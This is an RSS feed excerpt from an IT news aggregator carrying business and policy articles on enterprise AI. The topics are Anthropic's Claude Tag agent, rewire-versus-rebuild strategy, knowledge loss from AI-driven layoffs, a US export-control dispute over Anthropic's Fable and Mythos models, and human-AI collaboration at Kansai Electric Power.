actively surveilling information flows and making editorial judgments about what humans need to know. For regulated industries, this raises questions that existing AI governance policies may not yet address.</p><p>The third is pricing. Anthropic has not published detailed pricing for Claude Tag beyond noting that it runs on token-based spending with administrative controls. For an agent that monitors channels continuously, builds memory, and works asynchronously over hours or days, the token consumption profile could look very different from traditional AI usage. And the fourth is reliability: Anthropic has been candid in recent months about infrastructure strain caused by surging demand, and for a product positioned as an always-on team member, downtime carries a different kind of cost than it does for a tool invoked on demand.</p><h2><b>What Claude Tag signals about the future of enterprise work</b></h2><p>Anthropic says its goal is to expand Claude Tag beyond Slack "so that teams can tag @Claude in the many other places they work." The company is clearly eyeing the full collaboration surface — Microsoft Teams, email, project management tools, and beyond. If Claude Tag succeeds, it will validate a model of enterprise AI that looks less like a tool and more like a new category of worker: one that never sleeps, never forgets what was discussed in the channel last Tuesday, and never needs to be onboarded twice.</p><p>But the deeper significance of this launch may be what it reveals about the competitive dynamics reshaping enterprise software. For decades, the most valuable real estate in business technology was the system of record — the database, the CRM, the ERP. The current AI arms race suggests that the next era of enterprise value will be captured not by the system that stores the data, but by the agent that sits in the room where the work happens and understands what to do with it. Anthropic just gave that agent a name, a permanent seat in the channel, and permission to speak up when it thinks it has something to say. The question for every enterprise technology leader is no longer whether that agent will arrive. It is whether they are ready to manage it when it does.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rewire or rebuild? The AI decision every CIO needs to get right]]></title>
<description><![CDATA[The question every board, CEO and CIO must answer in 2026 isn’t whether to use AI. It’s whether to use AI to improve what you have, or to start again. Most organizations are getting this choice wrong, defaulting to whichever option matches their risk appetite, rather than applying clear strategic...]]></description>
<link>https://tsecurity.de/de/3618325/it-nachrichten/rewire-or-rebuild-the-ai-decision-every-cio-needs-to-get-right/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618325/it-nachrichten/rewire-or-rebuild-the-ai-decision-every-cio-needs-to-get-right/</guid>
<pubDate>Tue, 23 Jun 2026 15:03:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The question every board, CEO and CIO must answer in 2026 isn’t whether to use AI. It’s whether to use AI to improve what you have, or to start again. Most organizations are getting this choice wrong, defaulting to whichever option matches their risk appetite, rather than applying clear strategic criteria.</p>



<p>Rewiring treats existing processes, teams and systems as the frame, using AI as the wiring that makes them faster and smarter. The enterprise stays recognisable. Org charts shift modestly. Underneath, AI accelerates throughput and cuts manual effort e.g. AI co-pilots in legal review, ML-driven demand forecasting, generative AI auto-resolving Tier 1 support tickets.</p>



<p>Rebuilding treats the current operating model as legacy and uses AI as the architectural foundation for something structurally different. Entire functions may disappear or be reborn. Processes are redesigned from first principles with AI at the core, not bolted on. Think: a digital-only insurance carrier built around AI underwriting by default, not as an add-on.</p>



<p>Neither is universally correct. The organizations winning this decade are applying disciplined criteria and increasingly, sequencing both.</p>



<h2 class="wp-block-heading">The decision framework</h2>



<p>Five questions determine the right path, and they need to be asked together, not in isolation.</p>



<p>Is the operating model the constraint, or is execution? If processes are sound but slow and error-prone: rewire, AI removes friction without touching the underlying logic. If the architecture itself is fragmented and siloed by design, rebuild. AI plugged into a broken process just produces faster, better-documented brokenness.</p>



<p>How much runway do you have? Rewiring delivers ROI in 3–12 months. Rebuilding takes 18–48 months before material value shows up. If competitive pressure demands proof of AI value within a year, rewire first. If an AI-native competitor has already entered your market with a structurally lower cost base, incremental improvement won’t close that gap, only rebuilding will.</p>



<p>Can your people absorb the change? A workforce that’s risk-averse or change-fatigued can adopt AI-in-place without existential threat to most roles. A rebuild without genuine leadership mandate and a credible workforce transition plan isn’t transformation, it’s poorly managed redundancy with better PR.</p>



<p>How bad is the technology debt, really? Most AI use cases can be delivered via APIs and abstraction layers without core system replacement. Rebuild only when the estate is so fragmented that a unified data layer or real-time decisioning is structurally impossible otherwise.</p>



<p>Does the prize justify the disruption? Bounded efficiency gains of 10–25% rarely justify a rebuild’s cost and risk. Step-changes in unit economics or customer proposition do.</p>



<h2 class="wp-block-heading">Who should decide</h2>



<p>This is a capital allocation and talent strategy decision with technology implications, not a technology decision. The most common governance failure is letting the CIO or a transformation consultancy own it unilaterally.</p>



<p>The decision table needs the CEO, who owns the risk-return trade-off and the mandate to change; the CFO, who must model the economics of both paths honestly, including the productivity dip during transition, not just peak-state ROI; the CHRO, who needs a credible transition strategy in place before the decision is taken, not after; the CIO, who assesses technical feasibility but shouldn’t be making the strategic call alone; and business unit leaders, whose operational insight and buy-in are non-negotiable. An AI-literate independent board voice helps prevent both excessive caution and hype-driven overreach.</p>



<h2 class="wp-block-heading">Costs, benefits and where maximum value sits</h2>



<p>Rewiring’s ceiling is real, gains are bounded by the existing model, and it risks “AI-washing”: surface deployment without structural impact. But it’s fast, lower risk, preserves institutional knowledge and compounds across multiple waves over several years.</p>



<p>Rebuilding can deliver 30–60% structural cost reduction and capabilities simply unavailable to a rewired legacy model, but it carries a real failure rate (high for large transformations), heavy upfront investment and a multi-year J-curve before returns appear.</p>



<p>Maximum value rarely comes from choosing one exclusively. It comes from sequencing: rewire to generate cash, capability and credibility, then rebuild the two or three domains where AI-native architecture creates a genuine moat, while continuing to rewire everything else.</p>



<h2 class="wp-block-heading">Case in point: An Australian tourism and cruise operator</h2>



<p>Consider one of Australia’s largest integrated tourism and cruise businesses, simultaneously a B2C retailer, a B2B distributor to thousands of agency and wholesale clients globally, an aggregator marketplace for 1,800-plus independent tourism operators, and a cruise operator with offshore shared services spanning finance, customer contact and content management.</p>



<p>By 2024, the pressures had converged: AI-native travel platforms eroding acquisition economics, independent operators demanding dynamic pricing the platform couldn’t offer, and offshore cost structures under threat from automation. Leadership’s assessment found a split picture. The B2C and shared-services functions were sound but manual, a rewiring opportunity. The aggregator marketplace’s static catalogue and rules-based search were the actual constraint, no amount of AI on top would fix that. It needed rebuilding.</p>



<p>Rather than choose one path, the executive team sequenced three horizons. Horizon 1 rewired customer contact (AI triage cut Tier 1 escalations by 34%), content management (AI drafting cut operator listing time by 70%, eliminating a 23-day onboarding backlog), finance operations, B2C personalization (higher email revenue) and cruise crew scheduling (15% lower overtime). Within 18 months this delivered a million in annualised savings, funding and validating the next move.</p>



<p>Horizon 2 rebuilt the marketplace itself: AI-native semantic search lifted booking conversion by 24%; opt-in dynamic pricing lifted operator revenue per booking 16% for the first cohort; automated onboarding cut new-operator time-to-live from 23 days to three.</p>



<p>Critically, the offshore teams whose roles were most exposed to automation weren’t reduced, they were redeployed into quality assurance and operator onboarding, work that leveraged the institutional knowledge AI couldn’t replicate. Zero redundancies came out of Horizon 1. That decision wasn’t only ethical; the content quality gains from experienced specialists focusing on QA rather than production were measurable.</p>



<p>The lesson generalises well beyond travel: rewiring generated the cash, capability and credibility that made rebuilding possible. Neither path alone would have delivered the same outcome, and the sequencing mattered as much as the technology choices themselves.</p>



<h2 class="wp-block-heading">What this means for CIOs</h2>



<p>Start with rewiring, generate tangible ROI within 12 months and use it to build capability and board trust. Watch for your structural ceiling: the point where further rewiring yields diminishing returns because the model itself is the constraint. That’s your signal to rebuild selectively. Don’t rebuild everything; identify the two or three domains where AI-native architecture creates real competitive advantage and rewire the rest. And treat workforce transition as a strategic priority from day one, not an HR afterthought bolted on after the technology decisions are made.</p>



<p>The rewire-or-rebuild question isn’t a technology question. It’s a question about what kind of enterprise you’re choosing to become. The CIOs who get this right won’t be the ones who pick a side, they’ll be the ones who know exactly when to switch.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Preventing organizational amnesia in the age of AI]]></title>
<description><![CDATA[Let’s start by defining organizational amnesia, a phenomenon that has become all too familiar for many organizations today. I have seen firsthand that organizations are losing institutional knowledge due to large-scale layoffs. Since AI went mainstream, the problem has only compounded in volume a...]]></description>
<link>https://tsecurity.de/de/3618172/it-nachrichten/preventing-organizational-amnesia-in-the-age-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618172/it-nachrichten/preventing-organizational-amnesia-in-the-age-of-ai/</guid>
<pubDate>Tue, 23 Jun 2026 14:03:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Let’s start by defining organizational amnesia, a phenomenon that has become all too familiar for many organizations today. I have seen firsthand that organizations are losing institutional knowledge due to large-scale layoffs. Since AI went mainstream, the problem has only compounded in volume and velocity as companies opt for AI systems capable of running middle-office and operational functions with fewer employees. However, layoffs without a proper transition plan to capture years of institutional knowledge significantly risk an organization’s ability to succeed with AI.</p>



<p>AI without context can be confidently wrong and massively disrupt business operations previously led by humans. And without institutional knowledge, organizational amnesia sets in, despite the availability of Large Language Models (LLMs), strong technology infrastructure and abundant resources.</p>



<p>Many organizations now recognize the agentic era as the age of abundance, where AI presents unprecedented opportunities across every sector. But those opportunities also introduce serious operational and governance gaps that leaders need to close quickly before the competition catches up. The shift from the analytics era to the agentic era is difficult without a structured transformation plan and a strategy for retaining institutional knowledge.</p>



<p>As layoffs continue to increase, customer service and contact center roles have emerged as some of the hardest hit categories, with <a href="https://www.gartner.com/en/documents/6853766?utm_source=chatgpt.com" rel="nofollow">Gartner identifying generative AI and agentic AI</a> as major drivers of contact center workforce reduction and operational automation.  engineers and coders, content writers, data entry and back-office roles, HR and payroll staff, and data analysts all following the same pattern.</p>



<h2 class="wp-block-heading">Organizations are already trading labor efficiency for knowledge risk</h2>



<p>Microsoft announced a major round of layoffs in May 2025, affecting roughly 6,000 employees, reportedly the majority of them programmers, following CEO Satya Nadella’s confirmation that around <a href="https://www.cio.com/article/4000546/company-boards-push-ceos-to-replace-it-workers-with-ai.html?utm_source=chatgpt.com">30% of the company’s code is now written by AI</a>.</p>



<p>Amazon, in October 2025, announced one of the largest rounds of layoffs in its history, <a href="https://www.reuters.com/sustainability/amazon-lay-off-about-14000-roles-2025-10-28/?utm_source=chatgpt.com" rel="nofollow">cutting 14,000 corporate roles as it looked to invest in AI</a> and stated the need for a leaner organizational structure with fewer layers.</p>



<p>Klarna CEO said the company reduced its workforce by roughly 40% through AI-driven operational efficiencies and now expects its <a href="https://fortune.com/2026/02/17/klarnas-ceo-dario-amodei-ai-white-collar-workforce-shrink-2030/" rel="nofollow">white collar workforce to shrink by another third by 2030</a> as AI adoption accelerates across enterprise functions.</p>



<p>The trend continues as organizations pursue AI-driven autonomy, transitioning humans from being the main drivers to riding in the passenger seat.</p>



<h2 class="wp-block-heading">What should be a top-of-mind priority for leaders</h2>



<p>As CIOs shift from the analytics era to the agentic AI era, that shift is grounded in AI’s core capabilities: Faster execution and greater automation. The goals are familiar: Reduce overhead costs, manage risk and compliance, and grow revenue. Across industries, a common pattern emerges as AI presents increasingly viable options to replace human labor.</p>



<p>But that shift brings unique challenges. What recent layoffs have in common is this: Bulk replacement of the human workforce with AI agents risks losing institutional knowledge, which typically lives inside people’s heads and walks out the door the moment a seasoned employee leaves. An AI agent or model operating without that context becomes confidently wrong. Without guardrails, it can disrupt and destabilize core business operations, a phenomenon I call organizational amnesia.</p>



<p>Organizational amnesia is not simply about lacking good tools, capable AI models or well-managed data. It is about lacking the most critical ingredient: context intelligence.</p>



<p>In practical terms, context intelligence is the digital, machine-interpretable representation of how your business actually works. It means understanding customers, relationships, products, decision history, audit trails and interaction patterns. It is a shared understanding of reality, one that both AI and humans can act on, in real time, at the speed of machines.</p>



<p>For CIOs, context intelligence should be a top-of-mind priority. Simply having clean and centralized data is no longer enough. A structured path is needed to guide organizations from the data analytics era into the agentic era, one where AI is not just fast and automated, but genuinely grounded in how the business operates.</p>



<h2 class="wp-block-heading">A field CTO’s perspective: What a day with a customer’s data team taught me about organizational amnesia</h2>



<p>Recently, I had the opportunity to engage in a working session with the CIO and data leadership team at a large global travel and hospitality company, where I witnessed organizational amnesia playing out in real time.</p>



<p>The team was walking through their trade and group account data ecosystem. What existed was a collection of disconnected systems across their IT architecture: A legacy CRM as the aging source of truth for trade accounts, a global booking system, multiple regional CRM instances, a payment portal, a contact center interface and regional agent portals, all loosely connected through a mix of batch jobs and manual workarounds.</p>



<p>The room was filled with seasoned experts, and yet the deeper the discussions went, it became abundantly clear that the institutional knowledge of how their business actually worked was not captured in any system. It lived in the heads of the people sitting around that table.</p>



<p>One leader explained that the only way to look up a travel agent account was by phone number, a practice rooted in a time when every agency had a dedicated landline. Post-COVID, agents had shifted to cell phones, independent setups and flexible arrangements. The result was an explosion of duplicate records. If you searched by the wrong number, the system found nothing and a new account was simply created. No alert was triggered. No one noticed. The data quietly degraded over time. Now imagine deploying AI in such an ecosystem.</p>



<p>Another stakeholder described a payment portal that presented customers with a blank screen containing no trip information, no itinerary and no customer context. Deposits arrived, dropped into a queue and a team manually matched them to bookings. Ten minutes per interaction, on average, for a process that existed solely because the systems could not share context with each other.</p>



<p>When the conversation turned to why a key portion of their account data had never been migrated to their newer CRM platform, the answer was direct: The data was such a mess, and the relationships between agencies, sub-agencies, host accounts, consortia and individual agents were so layered and complex that no one had been able to configure the new system with enough confidence to make the move. In many ways, this is also a data governance failure: Data needs to be defined with clear business meaning, lineage traceability, ownership and quality parameters before it can power anything reliably.</p>



<p>That complexity was not a technology failure. It was the accumulated, undocumented, unstructured institutional knowledge of a company that had been in business for nearly a hundred years, living inside spreadsheets, inside people’s memories and inside a legacy system the team described as being well past its prime.</p>



<p>What struck me most was a moment when one of the senior architects paused and said: “I want to bring it back to the data. Where is it? Where does it need to be so it can solve all of these problems?” The room went quiet. Not because the question was hard, but because everyone knew the honest answer was, we do not actually know yet.</p>



<p>This is organizational amnesia. It is not a technology problem. It is a context problem. The tools exist. The talent is in the room. But without a machine-interpretable representation of how the business works, who the customers are, what relationships exist and how everything connects, even the best AI system will operate confidently in the wrong direction.</p>



<p>The team is doing the right thing. They are slowing down to build the foundation first: Defining the data model, establishing trusted master records for their account data and creating the context layer that will eventually make their AI investments pay off. That discipline is exactly what CIOs need to lead with as they move into the agentic era.</p>



<h2 class="wp-block-heading">The agentic era begins with a machine-readable view of the enterprise</h2>



<p>The journey from the analytics era to the agentic era is hard without a structured path to lead such a transformation. Before putting any AI system in place, leaders need to understand the context requirements and the human element behind their data. Without a proper transition plan and well-established governance processes, organizations risk confining their AI projects to experimentation that never scales, and organizational amnesia sets in.</p>



<p>A proper plan is not only necessary during layoffs or AI-driven workforce transitions. As organizations continue to invest more in AI and accumulate knowledge along the way, the foundations must be designed to capture context at every step, making it a shared reality for both humans and AI systems alike.</p>



<p>The most important question to bring to your data leadership team is this: Do we have a digital, machine-interpretable representation of our business? Do our AI systems and our people share a common understanding of who our customers are, what relationships exist, how they interact with us and where that data comes from?</p>



<p>If the answer is not a clear yes, that is where the work begins.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trump vs. Anthropic: The AI wars are heating up]]></title>
<description><![CDATA[The US government decision to force Anthropic to close down its latest and greatest AI models, Fable 5 and Mythos 5, was only the next step in a burgeoning battle between AI providers and ignorant politicians. 



Anthropic was on top of the world. Its Mythos 5 LLM had everyone excited. (If you b...]]></description>
<link>https://tsecurity.de/de/3618058/it-nachrichten/trump-vs-anthropic-the-ai-wars-are-heating-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618058/it-nachrichten/trump-vs-anthropic-the-ai-wars-are-heating-up/</guid>
<pubDate>Tue, 23 Jun 2026 13:18:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US government decision to force Anthropic to close down its latest and greatest AI models, Fable 5 and Mythos 5, was only the next step in a burgeoning battle between AI providers and ignorant politicians. </p>



<p>Anthropic was on top of the world. Its <a href="https://www.computerworld.com/article/4151808/leak-reveals-anthropics-mythos-a-powerful-ai-model-aimed-at-cybersecurity-use-cases-3.html">Mythos 5 LLM</a> had everyone excited. (If you believe the hype, it was kind of scary, too.) Even Anthropic CEO Dario Amodei admitted — or boasted? — that Mythos would bring an <a href="https://www.cnbc.com/2026/05/08/anthropic-mythos-ai-cybersecurity-banks.html" target="_blank" rel="noreferrer noopener">“enormous increase in the amount of vulnerabilities, in the amount of breaches”</a> to us all. But with that fear came the promise of more AI power than ever. </p>



<p>Then, the roof caved in.</p>



<p>On June 12, the US Commerce Department used its export-control powers to demand that <a href="https://www.computerworld.com/article/4185515/anthropics-new-privacy-policy-offers-us-consumers-a-way-around-fable-ban-2.html">Anthropic cut off access to its Fable 5 and Mythos 5 models for all foreign nationals</a>, citing national security concerns and fears of jailbreaks. After figuring out it had no way to do that, Anthropic pulled both of its newest frontier AI models offline worldwide.</p>



<p>Just what an AI company needs! All other Claude models, like the Opus and Sonnet series, remain online. But, come on, AI sales are all about the newest and most powerful models.  </p>



<p>Adding insult to injury — and this is true at many high-tech companies — Anthropic has many employees who aren’t US citizens. This means <a href="https://www.perplexity.ai/search/1bd48d18-3561-43e0-8749-ee6aa304de34" target="_blank" rel="noreferrer noopener">Anthropic’s own programmers can’t work on their latest models.</a></p>



<p>Of course, this isn’t the first time US President Donald J. Trump and company have tried to put a spoke in Anthropic’s wheels. Back in February, Anthropic refused to give Defense Secretary Pete Hegseth <a href="https://www.computerworld.com/article/4138860/anthropic-to-department-of-defense-drop-dead.html">the power to use its models to spy on American citizens</a> and to power autonomous weapons.</p>



<p>This go-around, it wasn’t because Anthropic refused to kowtow to Trump’s officials. It was, they say, out of fear that these new models could be used to attack American interests. </p>



<p>Mind you, no one in Trump’s regime has the tech chops to know just how dangerous, or not, any AI model is. As I recently noted, <a href="https://www.computerworld.com/article/4182531/trumps-new-ai-order-hallucinations-arent-just-for-llms.html">Trump’s AI executive order has no teeth</a>. Nor, more to the point, is there anyone in the administration with a clue about AI.</p>



<p>Specifically, at the Department of Commerce, neither Commerce Secretary Howard Lutnick nor William Kimmitt, undersecretary of commerce for international trade, knows a thing about AI. Just what we need, more political hacks deciding tech policy. </p>



<p>So, how did they discover that Fable and Mythos were theoretically a danger to the US? Good question. According to <em>The Wall Street Journal</em>, it was Amazon CEO Andy Jassy who told the Trump administration <a href="https://www.wsj.com/tech/ai/amazon-ceos-talks-with-u-s-officials-triggered-crackdown-on-anthropic-models-dcc90578" target="_blank" rel="noreferrer noopener">that Fable was untrustworthy</a>. Guess what? AWS offers its own full cloud AI stack, starting with Amazon Bedrock for foundation models, Amazon SageMaker for training and deployment, and a growing set of agentic AI tools and services. </p>



<p>In other words, Amazon is not a neutral party; it’s a competitor. Funny, that.</p>



<p>Sure, Amazon also has partnerships with Anthropic. But, in case you haven’t noticed, all the big AI companies are in bed with each other. That doesn’t stop them from fighting. What’s heating this up is that the AI companies are no longer offering flat-rate subscriptions and are replacing them with far more expensive, <a href="https://www.computerworld.com/article/4185848/how-companies-are-racing-to-solve-the-ai-token-problem.html">token-based pricing schemes</a>. </p>



<p>Armed with this information, Commerce gave Anthropic 90 minutes to fix its “problem.” Right. AI development is fast, but it’s not <em>that</em> fast. In addition, according to Anthropic, officials haven’t spelled out exactly what’s wrong. They only know that Commerce claims there was a “narrow, non‑universal jailbreak” in Fable.   </p>



<p>That’s it. That’s all. </p>



<p>Anthropic has also observed, with reason, that similar jailbreaks are possible on other leading models, like OpenAI’s GPT‑5.5. Those others, however, haven’t been hammered with comparable export controls.</p>



<p>The AI and security experts who do have an AI clue believe Commerce is behaving stupidly. (You won’t get any argument there from me.) For example, in an open letter, “<a href="https://freefable.org/" target="_blank" rel="noreferrer noopener">On Transparent AI Cyber Protections,</a>” they said Commerce’s directive “has taken the best models away from defenders, created market uncertainty, and risked America’s AI leadership without any real risk to justify it,” warning that pulling capabilities “away from defenders without a good reason when our adversaries are rapidly advancing is dangerous.”</p>



<p>Exactly so. </p>



<p>Besides, as Alex Zenla, co-founder and CTO of security company <a href="https://edera.dev/">Edera</a>, observed, Fable’s capability to identify insecure code sections <a href="https://www.linkedin.com/posts/azenla_open-letter-on-transparent-ai-cyber-protections-share-7473414102179160064-gyJy/?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAAAKH4BBvA-ZwpVFbaZDTqwLgneEpGsrHQ" target="_blank" rel="noreferrer noopener">is the baseline for any model you’d trust to write secure code.</a> The same capability exists in GPT-5.5, Opus, Sonnet, and Kimi 2.7 — it’s not unique to Fable. Pulling Fable from defenders doesn’t remove the capability from the threat landscape. It just removes it from the people trying to build safer systems.”</p>



<p>This is not about AI safety or security. </p>



<p>What this is really about is opening a new front in Trump’s war against the liberal-leaning Anthropic. Mind you, Anthropic isn’t really liberal. This has more to do with Anthropic not following in other <a href="https://www.citizen.org/news/big-tech-ceos-cozy-up-to-trump/" target="_blank" rel="noreferrer noopener">tech firms’ groveling to Trump</a>. </p>



<p>However, Trump doesn’t seem to realize that by essentially shutting down Anthropic’s biggest move to date, he’s also telling the world that they can’t rely on American AI companies down the road. Sure, in the short run, this hurts Anthropic. In the long run, it’s going to be another reason for Europe and other countries — <a href="https://www.computerworld.com/article/4180801/eu-sets-out-plans-to-reduce-reliance-on-us-cloud-providers.html">taking digital sovereignty seriously</a> — to avoid doing business with any American tech company. </p>



<p>In the meantime, Anthropic and Trump administration officials are in tense talks over whether, and under what safeguards, the models could return to the marketplace. Commerce indicates it might allow a narrower relaunch if jailbreak issues are resolved and additional controls are in place — whatever those might be. </p>



<p>Since it’s really all about massaging Trump’s ego, I’m not feeling terribly optimistic. Just ask Israeli Prime Minister Benjamin Netanyahu how well letting Trump set the terms of engagement goes. <a href="https://www.nytimes.com/2026/06/18/world/middleeast/israel-iran-deal-reaction-netanyahu.html" target="_blank" rel="noreferrer noopener">It’s not pretty</a>. </p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Successful AI adoption lies in collaboration, not replacement]]></title>
<description><![CDATA[Due to the rapid evolution of generative AI in recent years, many companies are accelerating their adoption of AI. Specifically, the scope of AI’s integration into day-to-day operations is steadily expanding, covering tasks such as minute-taking, summarization, searching, responding to inquiries,...]]></description>
<link>https://tsecurity.de/de/3617665/it-nachrichten/successful-ai-adoption-lies-in-collaboration-not-replacement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617665/it-nachrichten/successful-ai-adoption-lies-in-collaboration-not-replacement/</guid>
<pubDate>Tue, 23 Jun 2026 11:02:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Due to the rapid evolution of generative AI in recent years, many companies are accelerating their adoption of AI. Specifically, the scope of AI’s integration into day-to-day operations is steadily expanding, covering tasks such as minute-taking, summarization, searching, responding to inquiries, and drafting documents — all of which are typically performed by white-collar workers in office settings. At the same time, however, as discussions about AI adoption intensify, questions and concerns are emerging in society, such as “What will happen to human jobs?” and “To what extent should we entrust tasks to AI?”</p>



<p>My own fundamental premise when considering the roles of humans and AI is that AI should not be viewed merely as a tool for improving efficiency. The core issue that a CIO must fundamentally address is not which tasks to introduce AI into, but rather to thoroughly consider what roles humans and AI should each play, how they can complement one another, and how they can enhance each other to create new value that was previously unattainable.<br><br></p>



<p><a href="https://www.kepco.co.jp/english/corporate/list/report/pdf/ar2025_e_18.pdf" rel="nofollow">The Kansai Electric Power Group’s DX Vision 2035 — as part of its DX and AI strategy</a> — has clearly defined its vision as continuing to create new value through AI-driven transformation, with people collaborating with AI. The underlying philosophy is that the use of AI is by no means merely an improvement along the lines of conventional practices; rather, it aims to achieve a fundamental restructuring of business, operations, and work styles.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/dx-vision-2035.png?w=1024" alt="DX Vision 2035" class="wp-image-4187946" width="1024" height="568" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>Thus, collaboration between humans and AI does not mean replacing part of the work with AI but rather identifying the strengths of both humans and AI, and restructuring workflows, decision-making, and value delivery. I believe that only when this is achieved will AI evolve from a mere convenient tool into an indispensable weapon for corporate transformation.</p>



<h2 class="wp-block-heading">What is AI good at, and what should humans take on?</h2>



<p>The starting point for considering human-AI collaboration is to objectively assess the areas in which each excels.</p>



<p>AI excels at rapidly analyzing, processing, searching, and summarizing large volumes of information, presenting multiple options, and making inferences and evaluations based on established patterns. For example, gathering external information, drafting documents, preparing meeting minutes, reviewing contracts, responding to inquiries and creating preliminary risk assessments are areas where AI can demonstrate significant strength.</p>



<p>In fact, at Kansai Electric Power, the use of AI is accelerating across a wide range of use cases, including AI-powered compliance checks, AI critic agents for meeting agenda items, AI risk assessment agents for investment projects, the enhancement of the internal help desk through AI, and the overall reform of corporate sales processes through AI.</p>



<p>On the other hand, I believe that in the age of AI, humans should assume four key roles:</p>



<ol class="wp-block-list">
<li>Formulating questions</li>



<li>Interpreting meaning</li>



<li>Making decisions</li>



<li>Taking responsibility for the results</li>
</ol>



<p>While AI can present a vast number of options, it cannot bear the responsibility for making judgments such as “What do we value?” or “What should this company choose?” This is particularly true in the fields of management, customer service, and organizational operations, where factors such as ethics, trust, emotions, and the balancing of interests come into play. In such contexts, human will is ultimately the guiding principle.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/role-of-humans.png?w=1024" alt="The role of humans in the age of AI" class="wp-image-4187945" width="1024" height="524" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>In other words, humans are the ones who decide what questions to ask and what choices to make, while AI is, at best, a tool that quickly produces processing results. If we proceed with AI adoption while blurring this division of roles, it will lead to confusion on the front lines. Conversely, if this distinction is clearly established, AI implementation will not undermine front-line capabilities but will instead enhance human capabilities.</p>



<h2 class="wp-block-heading">Collaboration is not about division of labor but mutual reinforcement</h2>



<p>An important point to note here is that collaboration between humans and AI cannot be achieved simply by creating a basic division of labor chart. What matters is designing a relationship in which both parties draw out and enhance each other’s strengths.</p>



<p>Kiichiro Toyoda, the founder of Toyota Motor Corporation, once said, “Machines become complete when they become one with humans.” If we replace machines with AI in this quote, it becomes “AI becomes complete when it becomes one with humans.” I believe this expresses a timeless concept that remains fully relevant even in today’s AI- era.</p>



<p>So, what are the different patterns of human-AI collaboration? Below, I’ve created a four-quadrant matrix chart that categorizes how humans work based on Science vs. Art (horizontal axis) and Individual vs. Collaborative (vertical axis).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/human-ai-collaboration.png?w=1024" alt="What is human-AI collaboration?" class="wp-image-4187947" width="1024" height="564" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p>For example:</p>



<ul class="wp-block-list">
<li>[Quadrant D] Science × Individual Work ⇒ Tasks are entrusted to AI and robots.</li>



<li>[Quadrant C] Art × Performed Individually ⇒ AI expands human creativity.</li>



<li>[Area B] Science × Individually ⇒ Humans and AI collaborate</li>



<li>[Domain A] Art × carried out collaboratively by multiple people ⇒ Carried out primarily by humans; AI serves as a sounding board</li>
</ul>



<p>This is the breakdown.</p>



<p>The accuracy of AI’s output changes significantly depending on the quality of the questions humans pose to it. Conversely, when AI anticipates needs by organizing key points and gathering information, humans can devote their time to making more fundamental decisions. At Kansai Electric Power, a proof of concept (PoC) is underway to utilize AI agents for brainstorming management decisions, risk assessment, and stimulating discussion. This initiative is being pursued not with the idea of handing over work entirely to AI, but rather with the concept that AI extends human thinking and enhances the quality and speed of human decision-making.</p>



<p>As this collaboration progresses, the very nature of work will change.AI will take on the tasks of gathering, organizing, and analyzing information — tasks that humans previously spent a great deal of time on — allowing humans to focus on formulating questions and hypotheses, engaging with customers, being creative, building consensus, and making final decisions. As a result, we will see not just a reduction in man-hours, but an improvement in the quality and speed of work.</p>



<p>Thus, I believe we are moving toward a world where people and companies that make full use of AI will succeed, while people and companies that do not use AI will fall behind — not a world where AI takes people’s jobs.</p>



<p>The fundamental question a CIO should ask is not “What should we have AI do?” but rather “What will people be able to focus on once AI is introduced?” I believe that the ultimate value of collaboration lies not in the adoption rate of AI, but in the enhancement and acceleration of human work.</p>



<h2 class="wp-block-heading">Business process redesign is essential for achieving collaboration</h2>



